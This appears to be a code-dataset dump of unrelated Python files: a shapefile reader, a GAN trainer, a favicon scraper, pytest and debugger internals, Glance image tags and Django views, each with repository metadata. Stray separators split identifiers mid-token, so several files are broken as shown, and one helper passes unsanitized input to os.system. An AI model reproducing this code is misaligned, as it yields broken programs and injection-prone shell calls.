algorithm at http://www.cgafaq.info/wiki/Polygon_Area. A value >= 0
indicates a counter-clockwise oriented ring.
"""
xs, ys = map(list, zip(*coords))
xs.append(xs[1])
ys.append(ys[1])
return sum(xs[i]*(ys[i+1]-ys[i-1]) for i in range(1, len(coords)))/2.0
class _Shape:
def __init__(self, shapeType=None):
"""Stores the geometry of the different shape types
specified in the Shapefile spec. Shape types are
usually point, polyline, or polygons. Every shape type
except the "Null" type contains points at some level for
example verticies in a polygon. If a shape type has
multiple shapes containing points within a single
geometry record then those shapes are called parts. Parts
are designated by their starting index in geometry record's
list of shapes."""
self.shapeType = shapeType
self.points = []
@property
def __geo_interface__(self):
if self.shapeType in [POINT, POINTM, POINTZ]:
return {
'type': 'Point',
'coordinates': tuple(self.points[0])
}
elif self.shapeType in [MULTIPOINT, MULTIPOINTM, MULTIPOINTZ]:
return {
'type': 'MultiPoint',
'coordinates': tuple([tuple(p) for p in self.points])
}
elif self.shapeType in [POLYLINE, POLYLINEM, POLYLINEZ]:
if len(self.parts) == 1:
return {
'type': 'LineString',
'coordinates': tuple([tuple(p) for p in self.points])
}
else:
ps = None
coordinates = []
for part in self.parts:
if ps == None:
ps = part
continue
else:
coordinates.append(tuple([tuple(p) for p in self.points[ps:part]]))
ps = part
else:
coordinates.append(tuple([tuple(p) for p in self.points[part:]]))
return {
'type': 'MultiLineString',
'coordinates': tuple(coordinates)
}
elif self.shapeType in [POLYGON, POLYGONM, POLYGONZ]:
if len(self.parts) == 1:
return {
'type': 'Polygon',
'coordinates': (tuple([tuple(p) for p in self.points]),)
}
else:
ps = None
coordinates = []
for part in self.parts:
if ps == None:
ps = part
continue
else:
coordinates.append(tuple([tuple(p) for p in self.points[ps:part]]))
ps = part
else:
coordinates.append(tuple([tuple(p) for p in self.points[part:]]))
polys = []
poly = [coordinates[0]]
for coord in coordinates[1:]:
if signed_area(coord) < 0:
polys.append(poly)
poly = [coord]
else:
poly.append(coord)
polys.append(poly)
if len(polys) == 1:
return {
'type': 'Polygon',
'coordinates': tuple(polys[0])
}
elif len(polys) > 1:
return {
'type': 'MultiPolygon',
'coordinates': polys
}
class _ShapeRecord:
| """A shape object of any type."""
def __init__(self, shape=None, record=None):
self.shape = shape
self.record = record
class ShapefileException(Exception):
"""An exception to handle shapefile specific problems."""
pass
class Reader:
"""Reads the three files of a shapefile as a uni | t or
separately. If one of the three files (.shp, .shx,
.dbf) is missing no exception is thrown until you try
to call a method that depends on that particular file.
The .shx index file is used if available for efficiency
but is not required to read the geometry from the .shp
file. The "shapefile" argument in the constructor is the
name of the file you want to open.
You can instantiate a Reader without specifying a shapefile
and then specify one later with the load() method.
Only the shapefile headers are read upon loading. Content
within each file is only accessed when required and as
efficiently as possible. Shapefiles are usually not large
but they can be.
"""
def __init__(self, *args, **kwargs):
self.shp = None
self.shx = None
self.dbf = None
self.shapeName = "Not specified"
self._offsets = []
self.shpLength = None
self.numRecords = None
self.fields = []
self.__dbfHdrLength = 0
# See if a shapefile name was passed as an argument
if len(args) > 0:
if is_string(args[0]):
self.load(args[0])
return
if "shp" in kwargs.keys():
if hasattr(kwargs["shp"], "read"):
self.shp = kwargs["shp"]
if hasattr(self.shp, "seek"):
self.shp.seek(0)
if "shx" in kwargs.keys():
if hasattr(kwargs["shx"], "read"):
self.shx = kwargs["shx"]
|
datoszs/analysis | datoszs/remote.py | Python | mit | 504 | 0 | import os
import spiderpig as sp
@sp.configured()
def get_filename(filename, ssh_host=None, data_dir=None):
if ssh_host is None:
return filename
else:
local_copy = '{}/local_copy/{}'.format(data_dir, filename)
if not os.path.exists(lo | cal_copy):
dirs = os.path.dirname(local_copy)
if not os.path.exists(dirs):
os.makedirs(dirs)
os.system("scp {}:{} {}".format(ssh_host, filename, local | _copy))
return local_copy
|
axelniklasson/adalyzer | backend/location_optimisation.py | Python | mit | 1,650 | 0.033939 | from sklearn import cluster
import numpy as np
import datetime
#import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
class Location:
vehicle_data = None
@staticmethod
def get_data():
if Location.vehicle_data is not None:
return Location.vehicle_data.tolist()
else:
return None
@staticmethod
def __preprocess(payload):
lat_lng = np.empty([len(payload), 2])
for i in range(0, len(payload)):
lat_lng[i, 0] = payload[i]['positioning_system']['location']['lat']
lat_lng[i, 1] = payload[i]['positioning_system']['location']['lng']
return lat_lng
@staticmethod
def set_optimal_locations(data, count=5, no_clusters=10):
data = Location.__preprocess(data)
kmeans = cluster.KMeans(no_clusters, max_iter=300, n_init=10, init='k-means++', precompute_distances='auto')
clusters = kmeans.fit_predict(data)
classes_count = np.zeros([no_clusters,2])
for i in range(0, clusters.siz | e):
classes_count[clusters[i], 0] = clusters[i]
classes_count[clusters[i], 1] += 1
sorted = classes_count[classes_count[:,1].argsort()]
cluster_locations = np.empty([count,2])
c = 0
for j in range(sorted[:,0].size-1, sorted[:,0].size - count - 1, -1):
cluster_locations[c] = kmeans.cluster_centers_[sorted[j,0]]
c += 1
# Plot configurations
#fig = plt.figure()
#plt.plot(data[:,0], data[:,1], 'g | x')
#plt.plot(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], 'bo')
#plt.legend(('Data', 'Centroids'), loc='upper left')
#plt.show()
#plt.savefig('plt-gen-' + datetime.datetime.now().isoformat() + '.png')
#plt.close(fig)
Location.vehicle_data = cluster_locations |
lishuwnc/DCGAN | main.py | Python | apache-2.0 | 10,297 | 0.0101 | import tensorflow as tf
import tensorflow.contrib.slim as slim
import pprint
import os
from datasets import dataset_factory
from dcgan import dcgan_generator, dcgan_discriminator
from train import dcgan_train_step
from tensorflow.python.training import optimizer
from collections import OrderedDict
from utils import graph_replace
#from keras.optimizers import Adam
flags = tf.app.flags
flags.DEFINE_integer('batch_size', 128, 'The size of minibatch when training [128]')
flags.DEFINE_float('learning_rate', 2e-4, 'Learning rate of optimizer [2e-4]')
flags.DEFINE_string('optimizer', 'Adam', 'Optimizer used when training [Adam]')
flags.DEFINE_string('dataset_name', 'mnist', 'Image dataset used when trainging [mnist]')
flags.DEFINE_string('split_name', 'train', 'Split name of dataset [train]')
flags.DEFINE_string('dataset_dir', './data/mnist/', 'Path to dataset directory [./data/mnist]')
flags.DEFINE_string('checkpoint_path', None, 'Path to checkpoint path [None]')
flags.DEFINE_string('train_dir', './train', 'Path to save new training result [./train]')
flags.DEFINE_integer('max_step', 1000, 'Maximum training steps [1000]')
flags.DEFINE_integer('z_dim', 100, 'z-dim for generator [100]')
flags.DEFINE_float('beta1', 0.5, 'Beta1 for Adam optimizer [0.5]')
flags.DEFINE_float('beta2', 0.999, 'Beta2 for Adam optimizer [0.999]')
flags.DEFINE_float('epsilon', 1e-8, 'Epsilon for Adam optimizer [1e-8]')
flags.DEFINE_integer('log_every_n_steps', 10, 'Log every n training steps [10]')
flags.DEFINE_integer('save_interval_secs', 600, 'How often, in seconds, to save the model checkpoint [600]')
flags | .DEFINE_integer('save_summaries_secs', 10, 'How often, in seconds, to save the summary [10]')
flags.DEFINE_integer('sample_n', 16, 'How many images the network will produce in a sample process [16]')
flags.DEFINE_integer('unrolled_step', 0, 'Unrolled step in surrogate loss for generator [0]')
def extract_update_dict(update_ops):
"""Extract the map between tensor and its updated version in update_ops"""
update_map = OrderedDict()
name_to_var = {v.name: v for v in tf.global_variabl | es()}
for u in update_ops:
var_name = u.op.inputs[0].name
var = name_to_var[var_name]
value = u.op.inputs[1]
if u.op.type == 'Assign':
update_map[var.value()] = value
elif u.op.type == 'AssignAdd':
update_map[var.value()] = value + var
else:
raise ValueError('Undefined unroll update type %s', u.op.type)
return update_map
def main(*args):
FLAGS = flags.FLAGS
pp = pprint.PrettyPrinter(indent=4)
print('Running flags:')
pp.pprint(FLAGS.__dict__['__flags'])
tf.logging.set_verbosity('INFO')
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Graph().as_default():
provider = slim.dataset_data_provider.DatasetDataProvider(dataset_factory.get_dataset(FLAGS.dataset_name, FLAGS.split_name, FLAGS.dataset_dir),
common_queue_capacity=2*FLAGS.batch_size,
common_queue_min=FLAGS.batch_size)
[image] = provider.get(['image'])
image = tf.to_float(image)
image = tf.subtract(tf.divide(image, 127.5), 1)
z = tf.random_uniform(shape=([FLAGS.z_dim]), minval=-1, maxval=1, name='z')
label_true = tf.random_uniform(shape=([]), minval=0.7, maxval=1.2, name='label_t')
label_false = tf.random_uniform(shape=([]), minval=0, maxval=0.3, name='label_f')
sampler_z = tf.random_uniform(shape=([FLAGS.batch_size, FLAGS.z_dim]), minval=-1, maxval=1, name='sampler_z')
[image, z, label_true, label_false] = tf.train.batch([image, z, label_true, label_false], batch_size=FLAGS.batch_size, capacity=2*FLAGS.batch_size)
generator_result = dcgan_generator(z, 'Generator', reuse=False, output_height=28, fc1_c=1024, grayscale=True)
sampler_result = dcgan_generator(sampler_z, 'Generator', reuse=True, output_height=28, fc1_c=1024, grayscale=True)
discriminator_g, g_logits = dcgan_discriminator(generator_result, 'Discriminator', reuse=False, conv2d1_c=128, grayscale=True)
discriminator_d, d_logits = dcgan_discriminator(image, 'Discriminator', reuse=True, conv2d1_c=128, grayscale=True)
d_loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=label_false, logits=g_logits) + \
tf.losses.sigmoid_cross_entropy(multi_class_labels=label_true, logits=d_logits)
standard_g_loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=label_true, logits=g_logits)
if FLAGS.optimizer == 'Adam':
g_optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate,
beta1=FLAGS.beta1,
beta2=FLAGS.beta2,
epsilon=FLAGS.epsilon,
name='g_adam')
d_optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate,
beta1=FLAGS.beta1,
beta2=FLAGS.beta2,
epsilon=FLAGS.epsilon,
name='d_adam')
#unrolled_optimizer = Adam(lr=FLAGS.learning_rate,
# beta_1=FLAGS.beta1,
# beta_2=FLAGS.beta2,
# epsilon=FLAGS.epsilon)
elif FLAGS.optimizer == 'SGD':
g_optimizer = tf.train.GradientDescentOptimizer(learning_rate=FLAGS.learning_rate,
name='g_sgd')
d_optimizer = tf.train.GradientDescentOptimizer(learning_rate=FLAGS.learning_rate,
name='d_sgd')
var_g = slim.get_variables(scope='Generator', collection=tf.GraphKeys.TRAINABLE_VARIABLES)
var_d = slim.get_variables(scope='Discriminator', collection=tf.GraphKeys.TRAINABLE_VARIABLES)
#update_ops = unrolled_optimizer.get_updates(var_d, [], d_loss)
#update_map = extract_update_dict(update_ops)
#current_update_map = update_map
#pp.pprint(current_update_map)
current_update_map = OrderedDict()
for i in xrange(FLAGS.unrolled_step):
grads_d = list(zip(tf.gradients(standard_g_loss, var_d), var_d))
update_map = OrderedDict()
for g, v in grads_d:
update_map[v.value()] = v + g * FLAGS.learning_rate
current_update_map = graph_replace(update_map, update_map)
pp.pprint(current_update_map)
if FLAGS.unrolled_step != 0:
unrolled_loss = graph_replace(standard_g_loss, current_update_map)
g_loss = unrolled_loss
else:
g_loss = standard_g_loss
generator_global_step = slim.variable("generator_global_step",
shape=[],
dtype=tf.int64,
initializer=tf.zeros_initializer,
trainable=False)
discriminator_global_step = slim.variable("discriminator_global_step",
shape=[],
dtype=tf.int64,
initializer=tf.zeros_initializer,
trainable=False)
global_step = slim.get_or_create_global_step()
with tf.name_scope('train_step'):
train_step_kwargs = {}
train_step_kwargs['g'] = generator_global_step
train_step_kwargs['d'] = discriminator_global_step
if FLAGS.max_step:
train_step_kwargs['should_stop'] = tf.greater_equal(global_step, FLAGS.max_step)
else:
train_step_kwargs['should_stop'] = tf.constant(False)
train_step_kwargs['should_log'] = tf.equal(tf.mod(global_step, FLAGS.log_every_n_steps), 0)
train_op_d = slim.learning.create_train_op(d_loss, d_optimizer, variables_to_train=var_d, global_step=discriminator_global_step)
train_op_g = slim.learning.create_train_op(g_loss, g_optimizer, variables_to_train=var_g, global_step=generator_global_step)
train_op_s = tf.assign_add(global_step |
alirizakeles/tendenci | tendenci/apps/base/migrations/0002_auto_20150804_1545.py | Python | gpl-3.0 | 342 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(mig | rations.Migration):
dependencies = [
('base', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
| name='checklistitem',
options={},
),
]
|
tony/django-docutils | django_docutils/favicon/scrape.py | Python | mit | 2,207 | 0 | #!/usr/bin/env python
import logging
import sys
from urllib.parse import urljoin
import requests
from lxml import html
from six.moves.urllib.parse import urlparse
from django_docutils.exc import BasedException
logger = logging.getLogger(__name__)
def _request_favicon(url):
"""Tries to download favicon from URL and checks if it's valid."""
r = requests.get(url)
r.raise_for_status()
if 'image' not in r.headers['Content-Type']:
raise BasedException('Not an image')
return r.content
def get_favicon(url):
try:
r = requests.get(url)
r.raise_for_status()
# update url if redirected
if r.url != url:
url = r.url
doc = html.fromstring(r.content)
except requests.exceptions.ConnectionError as e:
raise BasedException(f"The website {url} isn't connecting:", e)
paths = ['//link[@rel="shortcut icon"]/@href', '//link[@rel="icon"]/@href']
for path in paths:
# Method 1: to find favicon via "shortcut icon"
favicons = doc.xpath(path)
if len(favicons): # Is pattern found?
try:
favicon_url = favicons[0]
favicon_url = urljoin(url, favicon_url)
return _request_favicon(favicon_url)
except Exception as e:
logger.debug(
'Could not retrieve {favicon_url}: \n{e}'.format(
favicon_url=favicon_url, e=e
)
)
# Method 2: site root/favicon.ico
try:
parsed = urlparse(url)
parsed = parsed._replace(path='/favicon.ico')
favicon_url = parsed.geturl()
return _request_favicon(favicon_url)
except Exception as e:
logger.debug(
'Could not retrieve {favicon_url}.\n{e}'.format(
favicon_url=favicon_url, e=e
)
)
raise BasedException(
"""
Could not retrieve favicon for {url}. Both strate | gies failed
""".format(
url=url
)
)
if __name__ == '__main__':
favicon = get_favicon(sys.argv[1])
file_ = open('/U | sers/me/favicon.ico', 'wb')
file_.write(favicon)
file_.close()
|
tareqalayan/pytest | _pytest/_code/source.py | Python | mit | 14,033 | 0.000356 | from __future__ import absolute_import, division, generators, print_function
import ast
from ast import PyCF_ONLY_AST as _AST_FLAG
from bisect import bisect_right
import linecache
import sys
import six
import inspect
import tokenize
import py
cpy_compile = compile
class Source(object):
""" a immutable object holding a source code fragment,
possibly deindenting it.
"""
_compilecounter = 0
def __init__(self, *parts, **kwargs):
self.lines = lines = []
de = kwargs.get('deindent', True)
rstrip = kwargs.get('rstrip', True)
for part in parts:
if not part:
partlines = []
if isinstance(part, Source):
partlines = part.lines
elif isinstance(part, (tuple, list)):
partlines = [x.rstrip("\n") for x in part]
elif isinstance(part, six.string_types):
partlines = part.split('\n')
if rstrip:
while partlines:
if partlines[-1].strip():
break
partlines.pop()
else:
partlines = getsource(part, deindent=de).lines
if de:
partlines = deindent(partlines)
lines.extend(partlines)
def __eq__(self, other):
try:
return self.lines == other.lines
except AttributeError:
if isinstance(other, str):
return str(self) == other
return False
__hash__ = None
def __getitem__(self, key):
if isinstance(key, int):
return self.lines[key]
else:
if key.step not in (None, 1):
raise IndexError("cannot slice a Source with a step")
newsource = Source()
newsource.lines = self.lines[key.start:key.stop]
return newsource
def __len__(self):
return len(self.lines)
def strip(self):
""" return new source object with trailing
and leading blank lines removed.
"""
start, end = 0, len(self)
while start < end and not self.lines[start].strip():
start += 1
while end > start and not self.lines[end - 1].strip():
end -= 1
source = Source()
source.lines[:] = self.lines[start:end]
return source
def putaround(self, before='', after='', indent=' ' * 4):
""" return a copy of the source object with
'before' and 'after' wrapped around it.
"""
before = Source(before)
after = Source(after)
newsource = Source()
lines = [(indent + line) for line in self.lines]
newsource.lines = before.lines + lines + after.lines
return newsource
def indent(self, indent=' ' * 4):
""" return a copy of the source object with
all lines indented by the given indent-string.
"""
newsource = Source()
newsource.lines = [(indent + line) for line in self.lines]
return newsource
def getstatement(self, lineno, assertion=False):
""" return Source statement which contains the
given linenumber (counted from 0).
"""
start, end = self.getstatementrange(lineno, assertion)
return self[start:end]
def getstatementrange(self, lineno, assertion=False):
""" return (start, end) tuple which spans the minimal
statement region which containing the given lineno.
"""
if not (0 <= lineno < len(self)):
raise IndexError("lineno out of range")
ast, start, end = getstatementrange_ast(lineno, self)
return start, end
def deindent(self, offset=None):
""" return a new source object deindented by offset.
If offset is None then guess an indentation offset from
the first non-blank line. Subsequent lines which have a
lower indentation offset will be copied verbatim as
they are assumed to be part of multilines.
"""
# XXX maybe use the tokenizer to properly handle multiline
# strings etc.pp?
newsource = Source()
newsource.lines[:] = deindent(self.lines, offset)
return newsource
def isparseable(self, deindent=True):
""" return True if source is parseable, heuristically
deindenting it by default.
"""
try:
import parser
except ImportError:
def syntax_checker(x):
return compile(x, 'asd', 'exec')
else:
syntax_checker = parser.suite
if deindent:
source = str(self.deindent())
else:
source = str(self)
try:
# compile(source+'\n', "x", "exec")
syntax_checker(source + '\n')
except KeyboardInterrupt:
raise
except Exception:
return False
else:
return True
def __str__(self):
return "\n".join(self.lines)
def compile(self, filename=None, mode='exec',
flag=generators.compiler_flag,
dont_inherit=0, _genframe=None):
""" return compiled code obj | ect. if filename is None
invent an artificial filename which displays
the source/line position of the caller frame.
"""
if not filename or py.path.local(filename).check(file=0):
if _genframe is None:
_genframe = sys._ge | tframe(1) # the caller
fn, lineno = _genframe.f_code.co_filename, _genframe.f_lineno
base = "<%d-codegen " % self._compilecounter
self.__class__._compilecounter += 1
if not filename:
filename = base + '%s:%d>' % (fn, lineno)
else:
filename = base + '%r %s:%d>' % (filename, fn, lineno)
source = "\n".join(self.lines) + '\n'
try:
co = cpy_compile(source, filename, mode, flag)
except SyntaxError:
ex = sys.exc_info()[1]
# re-represent syntax errors from parsing python strings
msglines = self.lines[:ex.lineno]
if ex.offset:
msglines.append(" " * ex.offset + '^')
msglines.append("(code was compiled probably from here: %s)" % filename)
newex = SyntaxError('\n'.join(msglines))
newex.offset = ex.offset
newex.lineno = ex.lineno
newex.text = ex.text
raise newex
else:
if flag & _AST_FLAG:
return co
lines = [(x + "\n") for x in self.lines]
linecache.cache[filename] = (1, None, lines, filename)
return co
#
# public API shortcut functions
#
def compile_(source, filename=None, mode='exec', flags=generators.compiler_flag, dont_inherit=0):
""" compile the given source to a raw code object,
and maintain an internal cache which allows later
retrieval of the source code for the code object
and any recursively created code objects.
"""
if isinstance(source, ast.AST):
# XXX should Source support having AST?
return cpy_compile(source, filename, mode, flags, dont_inherit)
_genframe = sys._getframe(1) # the caller
s = Source(source)
co = s.compile(filename, mode, flags, _genframe=_genframe)
return co
def getfslineno(obj):
""" Return source location (path, lineno) for the given object.
If the source cannot be determined return ("", -1)
"""
import _pytest._code
try:
code = _pytest._code.Code(obj)
except TypeError:
try:
fn = inspect.getsourcefile(obj) or inspect.getfile(obj)
except TypeError:
return "", -1
fspath = fn and py.path.local(fn) or None
lineno = -1
if fspath:
try:
_, lineno = findsource(obj)
except IOError:
pass
else:
fspath = code.path
lineno = code.firstlineno
assert isinstance(lineno, int)
return fspath, lineno
|
mcallaghan/tmv | BasicBrowser/scoping/migrations/0295_doc_tslug.py | Python | gpl-3.0 | 369 | 0 | # Generated by Django 2.2 on 2019-06-20 09:39
from django.db import migrations, models
class Migration( | migr | ations.Migration):
dependencies = [
('scoping', '0294_titlevecmodel'),
]
operations = [
migrations.AddField(
model_name='doc',
name='tslug',
field=models.TextField(null=True),
),
]
|
rocky/python2-trepan | trepan/processor/cmdbreak.py | Python | gpl-3.0 | 5,057 | 0.002571 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2009, 2010, 2015, 2017-2018 Rocky Bernstein
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import inspect
import pyficache
from trepan import misc as Mmisc
from trepan.processor.parse.semantics import build_bp_expr
from trepan.processor.parse.parser import LocationError
from trepan.processor.parse.scanner import ScannerError
from trepan.processor.location import resolve_location
def set_break(cmd_obj, func, filename, lineno, condition, temporary,
args, force=False):
if lineno is None:
part1 = ("I don't understand '%s' as a line number, function name,"
% ' '.join(args[1:]))
msg = Mmisc.wrapped_lines(part1, "or file/module plus line number.",
cmd_obj.settings['width'])
cmd_obj.errmsg(msg)
return False
if filename is None:
filename = cmd_obj.proc.curframe.f_code.co_filename
filename = cmd_obj.core.canonic(filename)
pass
if func is None:
ok_linenos = pyficache.trace_line_numbers(filename)
if not ok_linenos or lineno not in ok_linenos:
part1 = ('File %s' % cmd_obj.core.filename(filename))
msg = Mmisc.wrapped_lines(part1,
"is not stoppable at line %d." %
lineno, cmd_obj.settings['width'])
cmd_obj.errmsg(msg)
if force:
cmd_obj.msg("Breakpoint set although it may never be reached")
else:
return False
pass
bp = cmd_obj.core.bpmgr.add_breakpoint(filename, lineno, temporary,
condition, func)
if func and inspect.isfunction(func):
cmd_obj.msg('Breakpoint %d set on calling function %s()'
% (bp.number, func.func_name))
part1 = 'Currently this is line %d of file' % lineno
msg = Mmisc.wrapped_lines(part1, cmd_obj.core.filename(filename),
cmd_obj.settings['width'])
else:
part1 = ( 'Breakpoint %d set at line %d of file'
% (bp.number, lineno))
msg = Mmisc.wrapped_lines(part1, cmd_obj.core.filename(filename),
cmd_obj.settings['width'])
pass
cmd_obj.msg(msg)
return True
INVALID_PARSE_BREAK = (None, None, None, None)
def parse_break_cmd(proc, args):
if proc.current_command is None:
proc.errmsg("Internal error")
return INVALID_PARSE_BREAK
text = proc.current_command[len(args[0])+1:]
if len(args) > 1 and args[1] == | 'if':
location = '.'
condition = text[text.find('if ')+3:]
elif text == '':
location = '.'
condition = None
else:
try:
bp_expr = build_bp_expr(text)
except LocationError as e:
proc.errmsg("Error in parsing breakpoint expression | at or around:")
proc.errmsg(e.text)
proc.errmsg(e.text_cursor)
return INVALID_PARSE_BREAK
except ScannerError as e:
proc.errmsg("Lexical error in parsing breakpoint expression at or around:")
proc.errmsg(e.text)
proc.errmsg(e.text_cursor)
return INVALID_PARSE_BREAK
location = bp_expr.location
condition = bp_expr.condition
location = resolve_location(proc, location)
if location:
return location.method, location.path, location.line_number, condition
else:
return INVALID_PARSE_BREAK
# Demo it
if __name__=='__main__':
from trepan.processor.command import mock as Mmock
from trepan.processor.cmdproc import CommandProcessor
import sys
d = Mmock.MockDebugger()
cmdproc = CommandProcessor(d.core)
# print '-' * 10
# print_source_line(sys.stdout.write, 100, 'source_line_test.py')
# print '-' * 10
cmdproc.frame = sys._getframe()
cmdproc.setup()
for cmd in (
# "break '''c:\\tmp\\foo.bat''':1",
# 'break """/Users/My Documents/foo.py""":2',
# "break",
# "break 10",
# "break if True",
# "break cmdproc.py:5",
# "break set_break()",
"break 4 if i == 5",
# "break cmdproc.setup()",
):
args = cmd.split(' ')
cmdproc.current_command = cmd
print(parse_break_cmd(cmdproc, args))
pass
|
mozilla/mozilla-ignite | apps/badges/tests/view_tests.py | Python | bsd-3-clause | 1,703 | 0 | from badges.models import SubmissionBadge
from badges.tests.base_tests import BadgesBaseTest
from django.core.urlresolvers import reverse
from timeslot.tests.fixtures import create_user, create_submission
class BadgesSubmissionTest(BadgesBaseTest):
def setUp(self):
# Ignite fixtures are setup on the BadgesBaseTest
super(BadgesSubmissionTest, self).setUp()
self.badge_a = self.create_badge()
self.badge_b = self.create_badge(body='Award')
self.user = create_user('bob')
self.submission = create_submission('Hello', self.user, self.ideation)
def test_submission_badges(self):
"""Test the badges awarded in the Submission page"""
data = {
'submission': self.submission,
'badge': self.badge_a
}
entry = SubmissionBadge.objects.create(**data)
self.assertTrue(entry.is_pub | lished)
url = reverse('entry_show', kwargs={'entry_id': self.submission.id,
'phase': 'ideas'})
response = self.client.get(url)
self.assertEqual(len(response.context['badge_list']), 1)
def test_hidden_submission_badges(self):
| """Test the hidden badges are not shown on the Submission page"""
data = {
'submission': self.submission,
'badge': self.badge_a,
'is_published': False,
}
SubmissionBadge.objects.create(**data)
url = reverse('entry_show', kwargs={'entry_id': self.submission.id,
'phase': 'ideas'})
response = self.client.get(url)
self.assertEqual(len(response.context['badge_list']), 0)
|
klmitch/glance | glance/api/v2/image_tags.py | Python | apache-2.0 | 4,348 | 0 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific la | nguage governing | permissions and limitations
# under the License.
import glance_store
from oslo_log import log as logging
from oslo_utils import encodeutils
import webob.exc
from glance.api import policy
from glance.api.v2 import images as v2_api
from glance.common import exception
from glance.common import utils
from glance.common import wsgi
import glance.db
import glance.gateway
from glance.i18n import _
import glance.notifier
LOG = logging.getLogger(__name__)
class Controller(object):
def __init__(self, db_api=None, policy_enforcer=None, notifier=None,
store_api=None):
self.db_api = db_api or glance.db.get_api()
self.policy = policy_enforcer or policy.Enforcer()
self.notifier = notifier or glance.notifier.Notifier()
self.store_api = store_api or glance_store
self.gateway = glance.gateway.Gateway(self.db_api, self.store_api,
self.notifier, self.policy)
@utils.mutating
def update(self, req, image_id, tag_value):
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
image.tags.add(tag_value)
image_repo.save(image)
except exception.NotFound:
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.Forbidden:
msg = _("Not allowed to update tags for image %s.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPForbidden(explanation=msg)
except exception.Invalid as e:
msg = (_("Could not update image: %s")
% encodeutils.exception_to_unicode(e))
LOG.warning(msg)
raise webob.exc.HTTPBadRequest(explanation=msg)
except exception.ImageTagLimitExceeded as e:
msg = (_("Image tag limit exceeded for image %(id)s: %(e)s:")
% {"id": image_id,
"e": encodeutils.exception_to_unicode(e)})
LOG.warning(msg)
raise webob.exc.HTTPRequestEntityTooLarge(explanation=msg)
@utils.mutating
def delete(self, req, image_id, tag_value):
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
if tag_value not in image.tags:
raise webob.exc.HTTPNotFound()
image.tags.remove(tag_value)
image_repo.save(image)
except exception.NotFound:
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.Forbidden:
msg = _("Not allowed to delete tags for image %s.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPForbidden(explanation=msg)
class ResponseSerializer(wsgi.JSONResponseSerializer):
def update(self, response, result):
response.status_int = 204
def delete(self, response, result):
response.status_int = 204
class RequestDeserializer(wsgi.JSONRequestDeserializer):
def update(self, request):
try:
schema = v2_api.get_schema()
schema_format = {"tags": [request.urlvars.get('tag_value')]}
schema.validate(schema_format)
except exception.InvalidObject as e:
raise webob.exc.HTTPBadRequest(explanation=e.msg)
return super(RequestDeserializer, self).default(request)
def create_resource():
"""Images resource factory method"""
serializer = ResponseSerializer()
deserializer = RequestDeserializer()
controller = Controller()
return wsgi.Resource(controller, deserializer, serializer)
|
stxnext/intranet-open | src/intranet3/intranet3/views/presence.py | Python | mit | 3,777 | 0.002648 | # -*- coding: utf-8 -*-
import datetime
from babel.core import Locale
from sqlalchemy import func
from pyramid.view import view_config
from intranet3.utils.views import BaseView
from intranet3.models import User, PresenceEntry, Late, Absence, DBSession
from intranet3 import helpers | as h
from intranet3.utils import excuses
day_start = datetime.time(0, 0, 0)
day_end = datetime.time(23, 5 | 9, 59)
hour_9 = datetime.time(9, 0, 0)
locale = Locale('en', 'US')
@view_config(route_name='presence_list', permission='can_view_presence')
class List(BaseView):
def get(self):
date = self.request.GET.get('date')
if date:
date = datetime.datetime.strptime(date, '%d.%m.%Y')
else:
date = datetime.date.today()
start_date = datetime.datetime.combine(date, day_start)
end_date = datetime.datetime.combine(date, day_end)
def get_entries(city):
return DBSession.query(User.id, User.name, func.min(PresenceEntry.ts), func.max(PresenceEntry.ts))\
.filter(User.id == PresenceEntry.user_id)\
.filter((User.location == city) | (User.location == None))\
.filter(PresenceEntry.ts >= start_date)\
.filter(PresenceEntry.ts <= end_date)\
.group_by(User.id, User.name)\
.order_by(User.name)
def get_lates(city):
return DBSession.query(User.id, User.name, Late.late_start, Late.late_end)\
.filter(User.id == Late.user_id)\
.filter(User.location == city)\
.filter(Late.date == date)\
.order_by(User.name)
def get_absence(city):
return DBSession.query(User.id, User.name)\
.filter(User.id == Absence.user_id)\
.filter(User.location == city)\
.filter(Absence.date_start <= date)\
.filter(Absence.date_end >= date)\
.order_by(User.name)
locations = []
for name, (fullname, shortcut) in self.request.user.get_locations():
presences = dict(
shortcut=shortcut,
name=fullname,
entries=((user_id, user_name, start, stop, start.time() > hour_9) for (user_id, user_name, start, stop) in get_entries(name)),
late=get_lates(name),
absence=get_absence(name),
)
locations.append(presences)
return dict(
date=date,
prev_date=h.previous_day(date),
next_date=h.next_day(date),
excuses=excuses.presence(),
justification=excuses.presence_status(date, self.request.user.id),
locations=locations,
)
@view_config(route_name='presence_full', permission='can_view_presence')
class Full(BaseView):
def get(self):
date = self.request.GET.get('date')
if date:
date = datetime.datetime.strptime(date, '%d.%m.%Y')
else:
date = datetime.date.today()
start_date = datetime.datetime.combine(date, day_start)
end_date = datetime.datetime.combine(date, day_end)
